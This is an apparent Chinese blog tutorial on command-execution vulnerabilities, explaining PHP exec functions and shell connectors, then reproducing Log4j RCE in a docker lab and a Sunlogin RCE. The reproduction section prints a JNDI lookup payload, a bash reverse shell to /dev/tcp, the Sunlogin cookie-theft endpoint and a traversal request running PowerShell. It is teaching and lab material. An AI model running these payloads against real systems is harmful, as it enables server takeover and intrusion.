命令执行漏洞详细讲解

简介: 应用有时需要调用一些执行系统命令的函数,如PHP中的`system`、`exec`、`shell_exec`、`passthru`、`popen`、`proc_popen`等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

目录

一、原理

应用有时需要调用一些执行系统命令的函数,如PHP中的systemexecshell_execpassthrupopenproc_popen等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。


二、利用条件

1、应用调用执行系统命令的函数

2、将用户输入作为系统命令的参数拼接到了命令行中

3、没有对用户输入进行过滤或过滤不严

三、漏洞分类

1、远程命令执行漏洞

概念:

远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令

2、远程代码执行漏洞

概念:

代码执行漏洞也叫代码注入漏洞,指用户通过浏览器 提交执行恶意脚本代码,执行恶意构造的脚本代码

四、认识命令连接符

1、window层面

&

无论左边是false还是true,右边都执行,按顺序执行

&&:

具有短路效果,左边是false,右边不执行

|

表示A命令语句的输出,作为B命令语句的输入执行。当A为false的时候将不会执行

||

A||B,表示A命令语句执行失败,然后才执行B命令语句。

2、linux层面

&

在后台运行

;:

分号(;) 可以进行多条命令的无关联执行,每一条执行结果不会影响其他命令的执行

&&

按照顺序执行,如果前面应该正确就会执行下一个,如果错误那么就不会执行下一个

||

如果 || 左边的命令执行失败(返回1表示失败),才执行||右边的命令,否则不执行右边的命令,具有短路功能。

()

如果想执行几个命令,则需要用命令分隔符分号隔开每个命令,并使用圆括号()把所有命令组合起

五、漏洞的产生原因

1、代码层过滤不严

商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:system(“/bin/program --arg $arg”);

2、系统的漏洞造成命令注入

比如:bash破壳漏洞(CVE-2014-6271)

3、调用的第三方组件存在代码执行漏洞

如wordPress中用来处理图片的imageMagick组件

JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy等)

ThinkPHP命令执行

六、漏洞的危害

1、继承Web服务程序的权限去执行系统命令或读写文件

2、反弹shell

3、控制整个网站甚至服务器

4、进一步内网渗透

七、漏洞复现

1、log4j命令执行

1.1 开启docker服务

Service docker start


1.2 拖出并开启靶场

拖出的命令:

docker pull vulfocus/log4j2-rce-2021-12-09

启动的命令:

docker run -tid -p 3456:8080 vulfocus/log4j2-rce-2021-12-09


1.3 关闭防火墙并访问靶场

关闭防火墙:service firewalld stop

访问靶场:ip:3456


1.4 将poc插入目标url栏上并进行编码

poc:

${jndi:ldap://2lnhn2.ceye.io}

1…5:设置poc

bash -i >& /dev/tcp/ip/6666 0>&1


1.6 生成链接

Java -jar 文件名 -C “需要输出的信息” -A “ip”

将圈中的内容复制到目标url上已经构造好的函数中并进行编码



1.7 kali开启监听


此时成功获取了shell

2、向日葵命令执行

1. 向日葵的版本是<=11.0.0.33版本的,

2. 打开向日葵,需要连接服务器成功


3. 打开之后会自动开启一个40000-60000之间随机的端口,此时使用kali的nmap进行探测



此时扫出来49408、49409、49410、49411、49413、49414、49415、49492这八个端口

4、探测向日葵的端口

在浏览器中访问目标的ip:以上端口,访问向日葵的端口时,会报出以下页面


此时确定端口为49492

5、获取cookie值

poc:

目标IP:端口/cgi-bin/rpc?action=verify-haras


成功获取cookie

6、拿到CID-添加payload和cookie-发送http://ip/check?cmd=ping…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami


实操成功

相关文章
|
关系型数据库 MySQL 数据库
MySQL数据库加密和解密~认证登陆密码(mysql.user)和MySQL不区分大小写
MySQL数据库认证密码有两种方式: 1:MySQL 4.1版本之前是MySQL323加密 2:MySQL 4.1和之后的版本都是MySQLSHA1加密 还有函数:AES_ENCRYPT()加密函数和AES_DECRYPT()解密函数和MD5()加密。 MySQL数据库中自带old_password(str)和password(str)函数,前者是MySQL323加密,后者是MySQ
6236 0
|
10月前
|
人工智能 Devops 虚拟化
VMware vSphere 8.0 Update 3d 下载 - 企业级工作负载平台
VMware vSphere 8.0 Update 3d 下载 - 企业级工作负载平台
825 17
|
安全 持续交付 Docker
微服务架构和 Docker 容器化部署的优点是什么?
微服务架构和 Docker 容器化部署的优点是什么?
|
存储 移动开发 API
如何实现浏览器内多个标签页之间的通信
在浏览器中,可通过三种方式实现多标签页通信:一是利用 `localStorage`,通过设置及监听数据变化实现信息传递;二是借助 `Broadcast Channel API`,在同一频道下双向传输消息;三是运用 `SharedWorker`,作为共享工件在各标签间架起沟通桥梁。每种方法依据实际需求选择使用。
|
数据采集 人工智能 数据处理
Python自动化办公:提升效率,释放潜力(借助AI实现)
Python自动化办公:提升效率,释放潜力(借助AI实现)
1323 0
|
Dragonfly 安全 算法
|
Java Go C#
编程语言C#、C++、Java、Python、go 选择哪个好?
我想说的是,不论选择哪种编程语言,决定选择的都是你最终的目的,做选择之前,先充分调研每一个选择项,再做选择思路就会非常清晰了。
482 3
|
机器学习/深度学习 自然语言处理 索引
Moirai:Salesforce的时间序列预测基础模型
过去几个月,时间序列基础模型发展迅速,包括TimeGPT、Lag-Llama、Google的TimesFM、Amazon的Chronos和Salesforce的Moirai。本文聚焦于Moirai,这是一个用于时间序列预测的通用模型,尤其强调零样本推理能力。Moirai处理各种数据频率、适应未知协变量并生成概率预测。文章介绍了Moirai的三个关键特性:多尺寸补丁投影层、任意变量注意力和混合分布。此外,还对比了Moirai与Chronos和TimeGPT,发现Moirai在性能上未超越Chronos,后者在数据效率上更优,但不支持多变量预测。
778 2
|
Web App开发 JavaScript 开发者
谷歌浏览器chrome安装vue调试插件Vue-Devtools
谷歌浏览器chrome安装vue调试插件Vue-Devtools
1589 0
|
JavaScript 小程序 Java
扶贫助农|基于springboot的扶贫助农系统设计与实现(源码+数据库+文档)
扶贫助农|基于springboot的扶贫助农系统设计与实现(源码+数据库+文档)
746 0